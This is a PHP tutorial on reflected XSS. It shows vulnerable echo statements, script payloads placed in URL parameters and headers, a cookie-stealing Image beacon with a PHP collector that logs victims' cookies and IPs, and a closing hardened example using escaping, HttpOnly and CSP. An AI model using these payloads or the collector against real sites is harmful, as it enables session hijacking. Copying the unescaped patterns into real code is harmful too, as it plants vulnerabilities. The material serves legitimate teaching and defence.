# Reflected XSS vulnerabilities

**XSS vulnerabilities fall roughly into three types**

- reflected XSS
- stored XSS
- DOM-based XSS

Reflected XSS

The attacker sends someone a URL whose parameter carries malicious script code; when the URL is opened, that parameter is parsed and executed as HTML. It is non-persistent: the vulnerability only triggers when a user opens a link carrying the specific parameter.

**1. Direct output of a variable**

```php
<?php echo $_GET['xss']; ?>
```

```php
// http://localhost/test/ddd.php?p=<script>alert(document.cookie);</script>
<?php echo $_GET['p']; ?>
```

**2. $_SERVER variables**

$_SERVER['PHP_SELF']

```php
// http://localhost/test/ddd.php/<script>alert(1111);</script>
echo $_SERVER['PHP_SELF'];
```

$_SERVER['REQUEST_URI']

```php
// The browser percent-encodes the payload in the URL; once urldecode() is added,
// the decoded payload is echoed and the XSS fires.
echo urldecode($_SERVER['REQUEST_URI']);
```

$_SERVER['HTTP_USER_AGENT']

```php
// visit http://localhost/test/ddd.php
echo $_SERVER['HTTP_USER_AGENT'];
// output: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
```

How do we get this to output XSS? For convenience we install a browser extension to help: SIMPLE MODIFY HEADERS or modify header value.

![](https://img.kancloud.cn/12/79/1279d2abda6313ea88e8d455366474b7_1260x467.png)

Visit http://localhost/test/ddd.php again and the alert pops up; modify header value works the same way.

![](https://img.kancloud.cn/11/76/117620d2b8a47e1920079efaff7b76d1_1330x276.png)

$_SERVER['HTTP_REFERER']

**3. HTTP request format**

User-Agent:

Referer:

**4. Exploitation**

Test: using the cookie

`<script>var i=new Image;i.src="http://127.0.0.1/xss.php?c="%2bdocument.cookie;</script>`

Specifically:

```php
// visit:
// http://localhost/test/ddd.php?c=<script>var i=new Image;i.src="http://localhost/test/xss.php?c="%2bdocument.cookie;</script>

// ddd.php
echo $_GET['c'];

// xss.php
$cookie  = $_GET['c'];
$ip      = getenv('REMOTE_ADDR');
$time    = date("j F,Y, g: i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie:' . $cookie . '<br> IP:' . $ip . '<br> Date and Time:' . $time . '<br> Referer:' . $referer . '<br><br><br>');
```

modify headers
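As an added defensive example (not code from the original post), the PHP below takes the same five reflection points shown above and escapes each at the point of output, and sets the HttpOnly cookie flag and a CSP header that blunt the cookie-theft payload from section four; `e()`, `render_reflected()` and the sample request arrays are assumptions constructed for this example.

```php
<?php
// Added defensive example; not code from the original post. Each value the
// post echoes raw is passed through an HTML-escaping helper instead. The
// sample request arrays are constructed so the script runs from the CLI.
// Assumes PHP 7.3+ (setcookie() with an options array).

// Escape for HTML body and attribute context. ENT_QUOTES covers single
// quotes, so the value is also safe inside quoted attributes.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened replacement for the post's bare "echo $_GET['p']" and
// "echo $_SERVER[...]" lines; returns the fragment so a template can wrap it.
function render_reflected(array $get, array $server): string {
    $fields = [
        'p'           => $get['p'] ?? '',
        'PHP_SELF'    => $server['PHP_SELF'] ?? '',
        // Left percent-encoded on purpose: decoding it first is exactly
        // what made the post's urldecode() variant exploitable.
        'REQUEST_URI' => $server['REQUEST_URI'] ?? '',
        'User-Agent'  => $server['HTTP_USER_AGENT'] ?? '',
        'Referer'     => $server['HTTP_REFERER'] ?? '',
    ];
    $out = "<ul>\n";
    foreach ($fields as $label => $value) {
        $out .= '<li>' . e($label) . ': ' . e($value) . "</li>\n";
    }
    return $out . "</ul>\n";
}

// Headers go out before any body output. HttpOnly keeps the session cookie
// out of document.cookie, defeating the Image-beacon theft from section four
// even if an injection slips through; the CSP refuses inline <script> blocks.
if (PHP_SAPI !== 'cli') {
    setcookie('session', 'example-value',
        ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Constructed sample request carrying the post's payloads.
$sample_get    = ['p' => '<script>alert(document.cookie);</script>'];
$sample_server = [
    'PHP_SELF'        => '/test/ddd.php/<script>alert(1111);</script>',
    'REQUEST_URI'     => '/test/ddd.php?p=%3Cscript%3Ealert(1)%3C/script%3E',
    'HTTP_USER_AGENT' => '<script>alert(1111);</script>',
    'HTTP_REFERER'    => 'http://attacker.example/"><img src=x onerror=alert(1)>',
];
echo render_reflected($sample_get, $sample_server);
```

Under a web server, pass `$_GET` and `$_SERVER` to `render_reflected()` in place of the sample arrays; every `<`, `>`, `"` and `'` in the reflected values comes out as an entity, so none of the post's payloads reach the HTML parser as markup.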